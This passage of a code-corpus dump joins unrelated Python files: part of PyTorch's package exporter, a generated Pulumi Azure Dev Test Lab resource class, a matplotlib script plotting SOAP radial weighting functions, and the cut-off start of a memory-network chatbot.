package (str): The name of the module package this resource should go in (e.g. "my_package.my_subpackage")
resource (str): A unique name for the resource, used to identify it when loading.
binary (bytes): The data to save.
"""
filename = self._filename(package, resource)
self._write(filename, binary)
def extern_module(self, module_name: str):
"""Include `module` in the list of external modules the package can import.
This will prevent dependency discovery from saving
it in the package. The importer will load an external module directly from the standard import system.
Code for extern modules must also exist in the process loading the package.
Args:
module_name (str): e.g. "my_package.my_subpackage" the name of the external module
"""
if module_name not in self.external:
self.external.append(module_name)
def extern_modules(self, module_names: List[str]):
"""Extern a list of modules. Convience wrapper for calling :meth:`extern_module` on many items.
Args:
module_names (List[str]): List of module names
"""
for m in module_names:
self.extern_module(m)
def mock_module(self, module_name: str):
"""Replace the code for `module_name` in the package with a fake implementation. This module will return a fake
object for any attribute accessed from it. Because we copy file-by-file, the dependency resolution will sometimes
find files that are imported by model files but whose functionality is never used
(e.g. custom serialization code or training helpers).
Use this function to mock this functionality out without having to modify the original code.
Args:
module_name (str): e.g. "my_package.my_subpackage" the name of the module to be mocked out.
"""
if '_mock' not in self.provided:
self.save_source_file('_mock', str(Path(__file__).parent / '_mock.py'), dependencies=False)
is_package = hasattr(self._import_module(module_name), '__path__')
self.save_source_string(module_name, _MOCK_IMPL, is_package, dependencies=False)
def mock_modules(self, module_names):
"""Mock a list of modules. Convience wrapper for calling :meth:`mock_module` on many items.
Args:
module_names (List[str]): List of module names
"""
for module_name in module_names:
self.mock_module(module_name)
def _module_is_already_provided(self, qualified_name: str) -> bool:
for mod in self.external:
if qualified_name == mod or qualified_name.startswith(mod + '.'):
return True
return qualified_name in self.provided
def _persistent_id(self, obj):
# FIXME: the docs say that persistent_id should only return a string
# but torch store returns tuples. This works only in the binary protocol
# see
# https://docs.python.org/2/library/pickle.html#pickling-and-unpickling-external-objects
# https://github.com/python/cpython/blob/master/Lib/pickle.py#L527-L537
if torch.is_storage(obj):
storage_type = normalize_storage_type(type(obj))
obj_key = str(obj._cdata)
location = location_tag(obj)
self.serialized_storages[obj_key] = obj
return ('storage',
storage_type,
obj_key,
location,
obj.size())
return None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def _write(self, filename, str_or_bytes):
if isinstance(str_or_bytes, str):
str_or_bytes = str_or_bytes.encode('utf-8')
self.zip_file.write_record(filename, str_or_bytes, len(str_or_bytes))
def close(self):
"""Write the package to the filesystem. Any calls after close are now invalid.
It is preferable to use resource guard syntax instead:
with PackageExporter("file.zip") as e:
...
"""
if self.verbose:
print(f"Dependency graph for exported package: {self._write_dep_graph()}")
# Write each tensor to a file named tensor/the_tensor_key in the zip archive
for key in sorted(self.serialized_storages.keys()):
name = 'data/{}'.format(key)
storage = self.serialized_storages[key]
if storage.device.type == 'cpu':
# If it's on the CPU we can directly copy it into the zip file
num_bytes = storage.size() * storage.element_size()
self.zip_file.write_record(name, storage.data_ptr(), num_bytes)
else:
# Copy to a buffer, then serialize that
buf = io.BytesIO()
storage._write_file(buf, _should_read_directly(buf))
buf_value = buf.getvalue()
self._write(name, buf_value)
contents = ('\n'.join(self.external) + '\n')
self._write('extern_modules', contents)
del self.zip_file
def _filename(self, package, resource):
package_path = package.replace('.', '/')
resource = _normalize_path(resource)
return f'{package_path}/{resource}'
def _can_implicitly_extern(self, module_name: str):
return module_name == 'torch' or (module_name not in _DISALLOWED_MODULES
and _is_builtin_or_stdlib_module(self._import_module(module_name)))
# even though these are in the standard library, we do not allow them to be
# automatically externed since they offer a lot of system level access
_DISALLOWED_MODULES = ['sys', 'io']
def _is_builtin_or_stdlib_module(module: types.ModuleType) -> bool:
if module.__name__ in sys.builtin_module_names:
return True
filename = getattr(module, '__file__', None)
if filename is None:
return False
standard_lib = get_python_lib(standard_lib=True)
# this is often a subdirectory of standard_lib so we have to check
# that the file is in the standard_lib directory but not in this one
installed_libs = get_python_lib(standard_lib=False)
in_standard_lib = filename.startswith(standard_lib + '/')
in_installed_libs = filename.startswith(installed_libs + '/')
return in_standard_lib and not in_installed_libs
_MOCK_IMPL = """\
from _mock import MockedObject
def __getattr__(attr: str):
return MockedObject(__name__ + '.' + attr)
"""
def _read_file(filename: str) -> str:
with open(filename, 'rb') as f:
b = f.read()
return b.decode('utf-8')
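# --- Hedged usage sketch (added for illustration; not part of the original module) ---
# A minimal example of driving the exporter defined above: copy a tiny source string
# into the archive and pickle a plain Python object next to it. The archive name and
# the package/resource names are placeholders chosen only for this example.
if __name__ == '__main__':
    with PackageExporter('example_package.zip', verbose=False) as exporter:
        # provide source for a small package inside the archive
        exporter.save_source_string('example_pkg', 'GREETING = "hello"\n', is_package=True)
        # pickle a plain object; dependency scanning finds nothing extra to copy
        exporter.save_pickle('example_pkg', 'config.pkl', {'lr': 0.1, 'epochs': 3})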
|
sdk/python/pulumi_azure/devtest/lab.py
|
henriktao/pulumi-azure
| 109 |
101361
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['LabArgs', 'Lab']
@pulumi.input_type
class LabArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a Lab resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@pulumi.input_type
class _LabState:
def __init__(__self__, *,
artifacts_storage_account_id: Optional[pulumi.Input[str]] = None,
default_premium_storage_account_id: Optional[pulumi.Input[str]] = None,
default_storage_account_id: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
premium_data_disk_storage_account_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
unique_identifier: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Lab resources.
:param pulumi.Input[str] artifacts_storage_account_id: The ID of the Storage Account used for Artifact Storage.
:param pulumi.Input[str] default_premium_storage_account_id: The ID of the Default Premium Storage Account for this Dev Test Lab.
:param pulumi.Input[str] default_storage_account_id: The ID of the Default Storage Account for this Dev Test Lab.
:param pulumi.Input[str] key_vault_id: The ID of the Key used for this Dev Test Lab.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] premium_data_disk_storage_account_id: The ID of the Storage Account used for Storage of Premium Data Disk.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] unique_identifier: The unique immutable identifier of the Dev Test Lab.
"""
if artifacts_storage_account_id is not None:
pulumi.set(__self__, "artifacts_storage_account_id", artifacts_storage_account_id)
if default_premium_storage_account_id is not None:
pulumi.set(__self__, "default_premium_storage_account_id", default_premium_storage_account_id)
if default_storage_account_id is not None:
pulumi.set(__self__, "default_storage_account_id", default_storage_account_id)
if key_vault_id is not None:
pulumi.set(__self__, "key_vault_id", key_vault_id)
if location is not None:
pulumi.set(__self__, "location", location)
if name is not None:
pulumi.set(__self__, "name", name)
if premium_data_disk_storage_account_id is not None:
pulumi.set(__self__, "premium_data_disk_storage_account_id", premium_data_disk_storage_account_id)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if unique_identifier is not None:
pulumi.set(__self__, "unique_identifier", unique_identifier)
@property
@pulumi.getter(name="artifactsStorageAccountId")
def artifacts_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account used for Artifact Storage.
"""
return pulumi.get(self, "artifacts_storage_account_id")
@artifacts_storage_account_id.setter
def artifacts_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "artifacts_storage_account_id", value)
@property
@pulumi.getter(name="defaultPremiumStorageAccountId")
def default_premium_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Default Premium Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_premium_storage_account_id")
@default_premium_storage_account_id.setter
def default_premium_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_premium_storage_account_id", value)
@property
@pulumi.getter(name="defaultStorageAccountId")
def default_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Default Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_storage_account_id")
@default_storage_account_id.setter
def default_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "default_storage_account_id", value)
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Key used for this Dev Test Lab.
"""
return pulumi.get(self, "key_vault_id")
@key_vault_id.setter
def key_vault_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_vault_id", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="premiumDataDiskStorageAccountId")
def premium_data_disk_storage_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Storage Account used for Storage of Premium Data Disk.
"""
return pulumi.get(self, "premium_data_disk_storage_account_id")
@premium_data_disk_storage_account_id.setter
def premium_data_disk_storage_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "premium_data_disk_storage_account_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@storage_type.setter
def storage_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "storage_type", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> Optional[pulumi.Input[str]]:
"""
The unique immutable identifier of the Dev Test Lab.
"""
return pulumi.get(self, "unique_identifier")
@unique_identifier.setter
def unique_identifier(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "unique_identifier", value)
class Lab(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Dev Test Lab.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_lab = azure.devtest.Lab("exampleLab",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"Sydney": "Australia",
})
```
## Import
Dev Test Labs can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:devtest/lab:Lab lab1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DevTestLab/labs/lab1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: LabArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Dev Test Lab.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_lab = azure.devtest.Lab("exampleLab",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
tags={
"Sydney": "Australia",
})
```
## Import
Dev Test Labs can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:devtest/lab:Lab lab1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DevTestLab/labs/lab1
```
:param str resource_name: The name of the resource.
:param LabArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(LabArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = LabArgs.__new__(LabArgs)
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["tags"] = tags
__props__.__dict__["artifacts_storage_account_id"] = None
__props__.__dict__["default_premium_storage_account_id"] = None
__props__.__dict__["default_storage_account_id"] = None
__props__.__dict__["key_vault_id"] = None
__props__.__dict__["premium_data_disk_storage_account_id"] = None
__props__.__dict__["unique_identifier"] = None
super(Lab, __self__).__init__(
'azure:devtest/lab:Lab',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
artifacts_storage_account_id: Optional[pulumi.Input[str]] = None,
default_premium_storage_account_id: Optional[pulumi.Input[str]] = None,
default_storage_account_id: Optional[pulumi.Input[str]] = None,
key_vault_id: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
premium_data_disk_storage_account_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
unique_identifier: Optional[pulumi.Input[str]] = None) -> 'Lab':
"""
Get an existing Lab resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] artifacts_storage_account_id: The ID of the Storage Account used for Artifact Storage.
:param pulumi.Input[str] default_premium_storage_account_id: The ID of the Default Premium Storage Account for this Dev Test Lab.
:param pulumi.Input[str] default_storage_account_id: The ID of the Default Storage Account for this Dev Test Lab.
:param pulumi.Input[str] key_vault_id: The ID of the Key used for this Dev Test Lab.
:param pulumi.Input[str] location: Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
:param pulumi.Input[str] premium_data_disk_storage_account_id: The ID of the Storage Account used for Storage of Premium Data Disk.
:param pulumi.Input[str] resource_group_name: The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_type: The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] unique_identifier: The unique immutable identifier of the Dev Test Lab.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _LabState.__new__(_LabState)
__props__.__dict__["artifacts_storage_account_id"] = artifacts_storage_account_id
__props__.__dict__["default_premium_storage_account_id"] = default_premium_storage_account_id
__props__.__dict__["default_storage_account_id"] = default_storage_account_id
__props__.__dict__["key_vault_id"] = key_vault_id
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
__props__.__dict__["premium_data_disk_storage_account_id"] = premium_data_disk_storage_account_id
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["storage_type"] = storage_type
__props__.__dict__["tags"] = tags
__props__.__dict__["unique_identifier"] = unique_identifier
return Lab(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="artifactsStorageAccountId")
def artifacts_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Storage Account used for Artifact Storage.
"""
return pulumi.get(self, "artifacts_storage_account_id")
@property
@pulumi.getter(name="defaultPremiumStorageAccountId")
def default_premium_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Default Premium Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_premium_storage_account_id")
@property
@pulumi.getter(name="defaultStorageAccountId")
def default_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Default Storage Account for this Dev Test Lab.
"""
return pulumi.get(self, "default_storage_account_id")
@property
@pulumi.getter(name="keyVaultId")
def key_vault_id(self) -> pulumi.Output[str]:
"""
The ID of the Key used for this Dev Test Lab.
"""
return pulumi.get(self, "key_vault_id")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Specifies the supported Azure location where the Dev Test Lab should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Dev Test Lab. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="premiumDataDiskStorageAccountId")
def premium_data_disk_storage_account_id(self) -> pulumi.Output[str]:
"""
The ID of the Storage Account used for Storage of Premium Data Disk.
"""
return pulumi.get(self, "premium_data_disk_storage_account_id")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group under which the Dev Test Lab resource has to be created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="storageType")
def storage_type(self) -> pulumi.Output[Optional[str]]:
"""
The type of storage used by the Dev Test Lab. Possible values are `Standard` and `Premium`. Defaults to `Premium`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="uniqueIdentifier")
def unique_identifier(self) -> pulumi.Output[str]:
"""
The unique immutable identifier of the Dev Test Lab.
"""
return pulumi.get(self, "unique_identifier")
|
docs/src/assets/soap_weighting_plot.py
|
Iximiel/dscribe
| 265 |
101388
|
import numpy as np
import matplotlib.pyplot as plt
fig, (ax1, ax2, ax3) = plt.subplots(3, 1, sharex=True, figsize=(8,12))
# Plot pow with different settings
t = 1e-2
rcut = 5
settings = [
[2, rcut/(1/t*(1-t)) ** (1 / 2), 1],
[4, rcut/(1/t*(1-t)) ** (1 / 4), 1],
[8, rcut/(1/t*(1-t)) ** (1 / 8), 1],
]
rmin = 0
rmax = 5.2
for setting in settings:
m = setting[0]
r0 = setting[1]
c = setting[2]
d = c
r = np.arange(rmin, rmax, 0.01)
polym = c / (d + (r / r0) ** m)
ax2.plot(r, polym, label="m = {}, r0 = {:.3}, c = d = {}".format(m, r0, c))
ax2.axvline(rcut, color='k', linestyle='--')
ax2.text(
rcut*0.99,
0.5,
"rcut inferred from threshold",
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax2.set_title("pow")
ax2.set_xlabel("r")
ax2.set_ylabel("w(r)")
# Plot poly with different settings
settings = [
[rcut, 3],
[rcut, 2],
[rcut, 1],
]
for setting in settings:
r0 = setting[0]
m = setting[1]
c = 1
poly3m = []
for ri in r:
if ri < r0:
poly3m.append(c*(1 + 2 * (ri / r0) ** 3 - 3 * (ri / r0) ** 2) ** m)
else:
poly3m.append(0)
ax1.plot(r, poly3m, label="m = {}, r0 = {}, c={}".format(m, r0, c))
ax1.axvline(rcut, color='k', linestyle='--')
ax1.text(
rcut*0.99,
0.5,
"rcut inferred from r0".format(t),
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax1.set_title("poly")
ax1.set_xlabel("r")
ax1.set_ylabel("w(r)")
# Plot exp with different settings
settings = [
[rcut/np.log(1/t - 0), 1, 0],
[rcut/np.log(10/t - 9), 10, 9],
[rcut/np.log(100/t - 99), 100, 99],
]
for setting in settings:
r = np.arange(rmin, rmax, 0.01)
r0 = setting[0]
c = setting[1]
d = setting[2]
exp = c/(d + np.exp(r/r0))
ax3.plot(r, exp, label="r0={:.3}, c={}, d={}".format(r0, c, d))
ax3.axvline(rcut, color='k', linestyle='--')
ax3.text(
rcut*0.99,
0.5,
"rcut inferred from threshold",
verticalalignment='center',
horizontalalignment='right',
rotation="vertical",
)
ax3.set_title("exp")
ax3.set_xlabel("r")
ax3.set_ylabel("w(r)")
l = "upper right"
anchor = (0.9, 1)
ax1.set_xlim(rmin, rmax)
ax1.set_ylim(0, 1)
ax2.set_ylim(0, 1)
ax3.set_ylim(0, 1)
ax1.legend(loc=l, bbox_to_anchor=anchor)
ax2.legend(loc=l, bbox_to_anchor=anchor)
ax3.legend(loc=l, bbox_to_anchor=anchor)
plt.subplots_adjust(left=0.1, right=0.95, top=0.95, bottom=0.05)
plt.show()
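# --- Hedged helper sketch (added for illustration; not part of the original script) ---
# The three curves plotted above follow these closed forms; wrapping them as small
# functions makes it easy to probe a single radius. Parameter names mirror the plotting
# code (m, r0, c, d); the default values here are arbitrary.
def w_pow(r, r0, m, c=1.0, d=1.0):
    """pow-style weighting: c / (d + (r / r0) ** m)."""
    return c / (d + (np.asarray(r, dtype=float) / r0) ** m)

def w_poly(r, r0, m, c=1.0):
    """poly-style weighting: c * (1 + 2 (r/r0)^3 - 3 (r/r0)^2) ** m for r < r0, else 0."""
    r = np.asarray(r, dtype=float)
    inside = c * (1 + 2 * (r / r0) ** 3 - 3 * (r / r0) ** 2) ** m
    return np.where(r < r0, inside, 0.0)

def w_exp(r, r0, c=1.0, d=0.0):
    """exp-style weighting: c / (d + exp(r / r0))."""
    return c / (d + np.exp(np.asarray(r, dtype=float) / r0))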
|
Chapter09/chatbots_code/chatbot.py
|
vinay4711/Hands-On-Natural-Language-Processing-with-Python
| 110 |
101426
|
<reponame>vinay4711/Hands-On-Natural-Language-Processing-with-Python<gh_stars>100-1000
from sklearn import metrics
from itertools import chain
from six.moves import range, reduce
import numpy as np
import tensorflow as tf
from data_utils import tokenize, parse_dialogs_per_response
from memory_network import MemoryNetwork
def vectorize_candidates(candidates, word_idx, sentence_size):
# Determine shape of final vector
shape = (len(candidates), sentence_size)
candidates_vector = []
for i, candidate in enumerate(candidates):
# Determine zero padding
zero_padding = max(0, sentence_size - len(candidate))
# Append to final vector
candidates_vector.append(
[word_idx[w] if w in word_idx else 0 for w in candidate]
+ [0] * zero_padding)
# Return as TensorFlow constant
return tf.constant(candidates_vector, shape=shape)
def vectorize_data(data, word_idx, sentence_size, batch_size, max_memory_size):
facts_vector = []
questions_vector = []
answers_vector = []
# Sort data in descending order by number of facts
data.sort(key=lambda x: len(x[0]), reverse=True)
for i, (fact, question, answer) in enumerate(data):
# Find memory size
if i % batch_size == 0:
memory_size = max(1, min(max_memory_size, len(fact)))
# Build fact vector
fact_vector = []
for i, sentence in enumerate(fact, 1):
fact_padding = max(0, sentence_size - len(sentence))
fact_vector.append(
[word_idx[w] if w in word_idx else 0 for w in sentence]
+ [0] * fact_padding)
# Keep the most recent sentences that fit in memory
fact_vector = fact_vector[::-1][:memory_size][::-1]
# Pad to memory_size
memory_padding = max(0, memory_size - len(fact_vector))
for _ in range(memory_padding):
fact_vector.append([0] * sentence_size)
# Build question vector
question_padding = max(0, sentence_size - len(question))
question_vector = [word_idx[w] if w in word_idx else 0
for w in question] \
+ [0] * question_padding
# Append to final vectors
facts_vector.append(np.array(fact_vector))
questions_vector.append(np.array(question_vector))
# Answer is already an integer corresponding to a candidate
answers_vector.append(np.array(answer))
return facts_vector, questions_vector, answers_vector
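# Hedged shape sketch (added for illustration): for a toy example with
# sentence_size=4 and max_memory_size=2, vectorize_data pads every sentence to
# length 4 and keeps at most 2 fact sentences, e.g.
#
#     data = [([['hello', 'there']], ['hi'], 7)]
#     word_idx = {'hello': 1, 'there': 2, 'hi': 3}
#     facts, questions, answers = vectorize_data(data, word_idx, 4, 1, 2)
#     # facts[0].shape == (1, 4), questions[0].tolist() == [3, 0, 0, 0], answers[0] == 7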
class ChatBotWrapper(object):
def __init__(self, train_data, test_data, val_data,
candidates, candidates_to_idx,
memory_size, batch_size, learning_rate,
evaluation_interval, hops,
epochs, embedding_size):
self.memory_size = memory_size
self.batch_size = batch_size
self.evaluation_interval = evaluation_interval
self.epochs = epochs
self.candidates = candidates
self.candidates_to_idx = candidates_to_idx
self.candidates_size = len(candidates)
self.idx_to_candidates = dict((self.candidates_to_idx[key], key)
